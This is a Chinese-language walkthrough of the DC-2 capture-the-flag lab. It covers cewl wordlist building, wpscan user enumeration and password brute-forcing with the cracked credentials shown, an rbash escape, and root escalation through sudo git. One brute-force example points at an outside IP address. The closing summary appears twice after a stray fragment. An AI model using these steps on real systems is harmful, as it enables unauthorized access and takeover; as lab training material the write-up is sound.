查找同网段ip
nmap查端口
host文件地址:C:\Windows\System32\drivers\etc
发现无法正常访问页面,但在url地址栏会有http://dc-2域名提示,发现问题是本地无法解析域名dc-2
这时候就意识到对方可能做了重定向,在本机的host文件中加入ip地址和域名:
192.168.253.157 dc-2
成功访问
找到flag1
翻译一下
你通常的单词表可能不起作用,所以,也许你只需要保持冷静。
密码越多越好,但有时你无法赢得所有密码。
以一个身份登录以查看下一个标志。
如果找不到,请以其他身份登录。
cewl是kali自带的脚本工具
cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个字典,这个字典可以传给其他工具进行密码暴力破解。(简单理解就是利用爬取到的网站的内容去生成字典)
-m:用于指定最终生成字典中字符最小长度,只有超过指定长度才会记录到字典中
-d:爬取地址/网站的深度,一般默认是2
-e:收集包含email地址信息
-c:统计每个字符串出现的次数
-v:显示爬取过程中的详细信息
-w:将爬取到的字符串写入到指定文档
--debug:开启调试模式,这样就可以查看网站爬取过程中出现的错误和元数据了
--with-numbers:生成包含数字和字符的字典文件
--auth_type ,--auth_user, --auth_pass:目标网站需要进行页面登录认证的话,使用该参数来绕过页面认证的限制
--proxy_port:目标网站设置了代理服务器的话,–proxy option选项来启用代理URL功能,默认端口是8080
–proxy_host:代理主机地址
–proxy_username:代理的账户名
–proxy_password:代理的密码
wappalyzer查看网站信息
根据网站利用cewl生成密码并写入文档:
cewl -w dc-passwd.txt http://dc-2
网站的CMS为WordPress,那我们就可以使用wpscan对网站进行扫描:
wpscan是一款专门针对wordpress的扫描工具,采用ruby语言编写,能够扫描worpress网站中包括主题漏洞、插件漏洞以及wordpress网站本身存在的漏洞。wpscan还可以扫描wordpress网站启用的插件和其他功能。
wpscan --url "【目标系统URL】"
wpscan --url "【目标系统URL】" --enumerate t
可以着重性的扫描目标系统的主题
wpscan --url "【目标系统URL】" --enumerate vt
可以着重对wordpress系统的主题方面的漏洞进行扫描
wpscan --url "【目标系统URL】" --enumerate p
可以着重对WordPress的插件进行扫描
wpscan --url "【目标系统URL】" --enumerate vp
可以着重对WordPress的插件漏洞进行扫描
wpscan --url "【目标系统URL】" --enumerate u
可以对WordPress的用户进行枚举
wpscan --url "【目标系统URL】" --wordlist 【密码字典文件】 --username 【用户名】
即可进行wordpress用户名和密码的暴力破解
上述命令参数如果不存在,可以尝试执行命令:
wpscan --url "http://124.70.71.251:45419/" -P "【密码文件路径】" --usernames admin
TimThumbs是wordpress的常用文件,主要和缩略图的使用有关,wpscan有针对TimThumbs文件的扫描命令。执行命令:
wpscan --url "【目标系统URL】" --enumerate tt
爆破之后得到两组用户名和密码
wpscan --url http://dc-2/ -U user.txt -P dc-passwd.txt
jerry:adipiscing
tom:parturient
dirb http://dc-2
nikto扫一下
访问网站登录页面
http://dc-2/wp-login.php
发现flag2
翻译
如果你不能利用WordPress并采取快捷方式,还有另一种方法。
希望你找到了另一个切入点。
提示不能利用WordPress了
由于7744端口开着,使用ssh
找到flag3
发现cat不执行
vi查看
可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的所有压力道歉。
提示jerry和su
绕过也许
BASH_CMDS[a]=/bin/sh;a #注:把 /bin/sh 给a变量并调用
export PATH=$PATH:/bin/ #注:将 /bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #注:将 /usr/bin 作为PATH环境变量导出
还要用绕过
登录成功后切换到jerry的家目录,发现flag4
很高兴看到你已经走了这么远,但你还没有回家。
你仍然需要得到最终的标志(唯一真正重要的标志!!)。
这里没有提示-你现在只能靠自己了。:-)
快离开这里!!!!
提示中有git
查看可以使用root权限的命令,发现git可以使用,通过git提权
sudo -l
提权:
1、sudo git help config #在末行命令模式输入
!/bin/bash 或 !'sh' #完成提权
2、sudo git -p help
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell
这两种方式的前提是把shell窗口变小,使得不能在一页全部显示,才可以输入。
如果不能输入,说明你的shell窗口不够小。
找到最后flag
- 修改 hosts 文件来访问网站。
- 使用 cewl 制作字典。
- 使用 wpscan 对 WordPress 站点进行扫描和爆破。
- rbash 绕过
- sudo 提权
- git 提权
ser-images\image-20211108173501687.png)
如果不能输入,说明你的shell窗口不够小。
找到最后flag
- 修改 hosts 文件来访问网站。
- 使用 cewl 制作字典。
- 使用 wpscan 对 WordPress 站点进行扫描和爆破。
- rbash 绕过
- sudo 提权
- git 提权